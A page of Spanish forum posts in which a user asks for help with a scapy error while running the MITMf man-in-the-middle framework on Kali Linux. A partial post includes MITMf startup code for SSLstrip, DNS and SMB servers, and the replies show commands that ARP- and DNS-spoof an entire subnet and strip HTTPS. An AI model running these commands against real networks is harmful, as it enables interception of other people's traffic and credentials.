            for line in xrange(0, len(plugin.tree_info)):
                print "|  |_ {}".format(plugin.tree_info.pop())

        plugin.setup_logger()
        plugin.initialize(options)

        if plugin.tree_info:
            for line in xrange(0, len(plugin.tree_info)):
                print "|  |_ {}".format(plugin.tree_info.pop())

        plugin.start_config_watch()

if options.filter:
    from core.packetfilter import PacketFilter
    pfilter = PacketFilter(options.filter)
    print "|_ PacketFilter online"
    print "   |_ Applying filter {} to incoming packets".format(options.filter)
    try:
        pfilter.start()
    except KeyboardInterrupt:
        pfilter.stop()
        shutdown()

else:
    from core.sslstrip.CookieCleaner import CookieCleaner
    from core.sslstrip.StrippingProxy import StrippingProxy
    from core.sslstrip.URLMonitor import URLMonitor

    URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
    URLMonitor.getInstance().setCaching(options.preserve_cache)
    CookieCleaner.getInstance().setEnabled(options.killsessions)

    strippingFactory          = http.HTTPFactory(timeout=10)
    strippingFactory.protocol = StrippingProxy

    reactor.listenTCP(options.listen_port, strippingFactory)

    for plugin in plugins:
        if vars(options)[plugin.optname] is True:
            plugin.reactor(strippingFactory)

    print "|_ Sergio-Proxy v0.2.1 online"
    print "|_ SSLstrip v0.9 by Moxie Marlinspike online"

    #Start mitmf-api
    from core.mitmfapi import mitmfapi
    print "|"
    print "|_ MITMf-API online"
    mitmfapi().start()

    #Start the HTTP Server
    from core.servers.HTTP import HTTP
    HTTP().start()
    print "|_ HTTP server online"

    #Start DNSChef
    from core.servers.DNS import DNSChef
    DNSChef().start()
    print "|_ DNSChef v{} online".format(DNSChef.version)

    #Start the SMB server
    from core.servers.SMB import SMB
    SMB().start()
    print "|_ SMB server online\n"

    #start the reactor
    reactor.run()
    print "\n"

    shutdown()

P.D: Perdón por la cantidad de información pero me gustaría que me ayudasen a encontrar el error, GRACIAS DE ANTEMANO A TODOS.

#59

Dudas y pedidos generales / Re:Error al hacer un ataque MITM con el framework MITMf

Septiembre 23, 2015, 08:31:17 AM

Hola Jimeno muchas gracias por responder, me ocurre lo mismo, de ante mano te comunico que según las instrucciones para utilizar este framework, en el parámetro "--target" puedo ponerlo de las siguientes maneras: "--target 192.168.1.110", "--target 192.168.1.110,192.168.1.111", "--target 192.168.1.110-120" y "--target 192.168.1.1/24", sin animo de ofender aquí dejo las instrucciones de esta herramienta: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Comando utilizado:

Código: comando

mitmf -i eth0 --hsts  --spoof --dns --arp --target  192.168.1.1/24  --gateway 192.168.1.1

Error arrojado de nuevo:

Código: comando

    [*] MITMf v0.9 started... initializing plugins and modules
    [*] ARP Spoofing enabled
    Traceback (most recent call last):
      File "./mitmf.py", line 113, in <module>
        p.initialize(args)
      File "/usr/share/mitmf/plugins/Spoof.py", line 69, in initialize
        pkt = self.build_arp_req()
      File "/usr/share/mitmf/plugins/Spoof.py", line 229, in build_arp_req
        target_mac = getmacbyip(self.target)
      File "/usr/lib/python2.7/dist-packages/scapy/layers/l2.py", line 53, in getmacbyip
        tmp = map(ord, inet_aton(ip))
    socket.error: illegal IP address string passed to inet_aton

P.D: Gracias por responder a todos, pero deduzco que el problema no es el comando, si no la falta de algún archivo o ejecución del script en cuestión.

#60

Dudas y pedidos generales / Re:Error al hacer un ataque MITM con el framework MITMf

Septiembre 23, 2015, 07:30:31 AM

Hola Cl0udswX, de ante mano gracias por responder, obtengo el mismo resultado alternando el orden de la puerta de enlace y el rango de ips atacadas:

Comando utilizado nuevamente:

Código: texto

mitmf -i eth0 --hsts  --spoof --dns --arp --target  192.168.1.20-40  --gateway 192.168.1.1

Error arrojado de nuevo:

Código: text

[*] MITMf v0.9 started... initializing plugins and modules
[*] ARP Spoofing enabled
Traceback (most recent call last):
  File "./mitmf.py", line 113, in <module>
    p.initialize(args)
  File "/usr/share/mitmf/plugins/Spoof.py", line 69, in initialize
    pkt = self.build_arp_req()
  File "/usr/share/mitmf/plugins/Spoof.py", line 229, in build_arp_req
    target_mac = getmacbyip(self.target)
  File "/usr/lib/python2.7/dist-packages/scapy/layers/l2.py", line 53, in getmacbyip
    tmp = map(ord, inet_aton(ip))
socket.error: illegal IP address string passed to inet_aton

El sistema operativo con el cual estoy utilizando este framework, es Kali Linux 2.0, la manera en la que instale este framework, fue con:

Código: text

apt-get install mitmf

P.D: Si alguien me ayudase a resolver este problema, o a buscar una alternativa a este framework se lo agradeceriía, gracias de ante mano a la comunidad. Saludos davidhs.

Páginas 1 2 3 4